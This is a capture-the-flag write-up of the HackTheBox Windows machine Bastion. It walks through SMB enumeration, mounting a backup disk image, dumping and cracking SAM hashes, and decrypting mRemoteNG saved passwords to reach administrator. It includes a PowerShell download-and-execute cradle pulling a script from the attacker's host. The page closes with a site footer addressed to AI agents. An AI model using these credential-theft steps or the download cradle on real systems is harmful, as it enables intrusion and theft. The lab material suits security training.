# HackTheBox - Bastion ![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY0NJAtPWYRfUjpHn_U%2F-MY0NPgQwXjWbZQwwnlz%2Fimage.png?alt=media\&token=bdce5d2c-0219-40cc-b3b5-d8be3b5eb41b) ### Nmap scan (Basic and All port scan) ![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY0NJAtPWYRfUjpHn_U%2F-MY0NqJYWQA221WZ3DYj%2Fimage.png?alt=media\&token=c62e8425-65e8-4c9b-8683-ac780500b065) Always ping the machine before starting off with nmap scan and check ttl(Time to live) value. Most of the windows machine have a ttl value of 127. ``` nmap -sC -sV -oA nmap-bastion 10.10.10.134 ``` ![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY0NJAtPWYRfUjpHn_U%2F-MY0ONJC5eQGl_d7Uz-I%2Fimage.png?alt=media\&token=334edc17-6b5c-4231-a2b5-f0f80db126cb) ``` nmap -A -p- -T4 10.10.10.134 ``` ![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY0NJAtPWYRfUjpHn_U%2F-MY0YMp2izzQv8e40X8h%2Fimage.png?alt=media\&token=191f0f07-f48b-48be-8e4f-f14d3b46a0af) ### Samba Enumeration (Port 139/445) Using smbclient to list all the shares. ![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY0NJAtPWYRfUjpHn_U%2F-MY0P5w8hdAhJ9lvW0eC%2Fimage.png?alt=media\&token=2ea15456-15af-4624-b3a8-5ec64b8ad0a0) We can also use smbmap with a null authentication. ![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY0NJAtPWYRfUjpHn_U%2F-MY0PDzFk-njKr50IVCQ%2Fimage.png?alt=media\&token=812b8810-38b0-449d-a33f-351f4d0485ec) This box covers the same scenario as that of Bastion Host. So what exactly is Bastion host ? `A bastion host is a special-purpose computer on a network specifically designed and configured to withstand attacks. The computer generally hosts a single application, for example a proxy server, and all other services are removed or limited to reduce the threat to the computer.` ![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY0NJAtPWYRfUjpHn_U%2F-MY0Uk1XzqbebeIRgs6l%2Fimage.png?alt=media\&token=c08787b8-2b44-40d8-93e7-b2cbf755eabf) ### Mounting the SMB Share We can mount the SMB Share using `mount` command. ![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY0NJAtPWYRfUjpHn_U%2F-MY0XAWIkScN5SQZEi1w%2Fimage.png?alt=media\&token=e7ba2de9-f9ff-4894-9926-ac2ab454f9de) ![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY0NJAtPWYRfUjpHn_U%2F-MY0XLtenQC3Gptfwqmu%2Fimage.png?alt=media\&token=2a74b634-da96-4b25-8e10-dceecf7353ac) The Backup file size is really very large (Approximately 5 Gs) ![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY0NJAtPWYRfUjpHn_U%2F-MY0XhZlnw5xrp2TJx1H%2Fimage.png?alt=media\&token=4bf59270-54e7-4d07-af68-890d6227e9b2) `Note: A VHD file contains a virtual hard disk image used by Microsoft Windows Virtual PC, a Windows virtualization program. It stores the contents of a hard disk of a virtual machine (VM), which may include disk partitions, a file system, files, and folders.` ### Mounting the .vhd file using guestmount We can extract the .vhd file using 7z in Linux System. First we can list all the files using the following command. `7z l 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd` To mount the .vhd file system, we will be using guestmount in Linux. ``` apt-get install libguestfs-tools ``` ![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY0NJAtPWYRfUjpHn_U%2F-MY0aTanCrj4jeTEwZ49%2Fimage.png?alt=media\&token=f87b0eee-72de-455a-b915-dc86793f673e) ![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY0NJAtPWYRfUjpHn_U%2F-MY0dDOQeOM8BRsCaGGD%2Fimage.png?alt=media\&token=bf05b03a-e3ad-47d8-90c2-6641390e32bf) One thing we can do is get the SAM file and SYSTEM file which contains hashes for the users present on the system. ### Hash Cracking with hashcat > The Security Account Manager (**SAM**) is a database **file in Windows** XP, **Windows** Vista, **Windows** 7, 8.1 and 10 that stores users' passwords. It can be used to authenticate local and remote users. ... **SAM** uses cryptographic measures to prevent unauthenticated users accessing the system. ``` impacket-secretsdump -sam SAM -system SYSTEM local ``` ![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY0NJAtPWYRfUjpHn_U%2F-MY0eZBB0gKMRy6Y37bx%2Fimage.png?alt=media\&token=724a661e-4fff-463f-86d9-a3e238a51a68) > Tip: If the hash start with 31d6\*\*\* , that means the Administrator account is disabled. We can crack the hash for L4mpje user using hashcat with the mode 1000 (NTLM Hash) ``` hashcat.exe -m 1000 hash.txt rockyou.txt ``` ![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY0NJAtPWYRfUjpHn_U%2F-MY0g6UBZpTFXAm4mu5M%2Fimage.png?alt=media\&token=11ad7581-5845-4d53-a359-f8e2b7b47240) ### SSH Access as l4mpje We do know that SSH is running on the machine and we can use that to get remote access. ![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY0NJAtPWYRfUjpHn_U%2F-MY0hogcRUIIPp5AC9lz%2Fimage.png?alt=media\&token=a11f35a6-1319-4dec-8a21-1d2506ab9bca) ### System Enumeration using JAWS We will use JAWS (Just Another Windows Script) for system enumeration. ``` IEX(New-Object Net.WebClient).downloadString('http://10.10.14.2:8000/jaws-enum.ps1') ``` ![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY0NJAtPWYRfUjpHn_U%2F-MY0kNYu8sSpyhpCztup%2Fimage.png?alt=media\&token=670f11a4-aff0-4c66-a457-626acaed0d2d) ![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY0kxHUWMdbXcitmqgc%2F-MY0r9-CPNDnKvVdVhGK%2Fimage.png?alt=media\&token=67cc9c0b-adbf-4b78-b844-6da4e2900caa) ### Exploiting mRemoteNG to extract passwords We have mRemoteNG installed on the system and it usually stores the configuration files in AppData folder of the User. > **mRemoteNG** is a fork of **mRemote**: an open source, tabbed, multi-protocol, remote connections manager for Windows. **mRemoteNG** adds bug fixes and new features to **mRemote**. It allows you to view all of your remote connections in a simple yet powerful tabbed interface. We can view the configuration files under: C:\Users\L4mpje\AppData\Roaming\mRemoteNG `Note: dir /a will display all the files (including hidden) starting with 'A` ![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY0kxHUWMdbXcitmqgc%2F-MY0sBZmx5ga6H8UTfJ4%2Fimage.png?alt=media\&token=67b450f9-8668-4ff8-9fc4-f97ff802d39d) We have the `confCons.xml` file and we also have base64 string that can be decrypted with the following tool : ![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY0kxHUWMdbXcitmqgc%2F-MY0t7_ayJD9dzRTSGq6%2Fimage.png?alt=media\&token=cefa7fb4-97ba-4fa4-aafd-f556788668ae) And we get the password for administrator. Use ssh or evil-winrm to get shell access. ![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY0kxHUWMdbXcitmqgc%2F-MY0tzWKDEHom-IOnjJZ%2Fimage.png?alt=media\&token=3d719a13-4411-41d8-9329-90a9d1fbbb12) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://akshaydeepakshinde.gitbook.io/hackthebox-windows/hackthebox-bastion.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.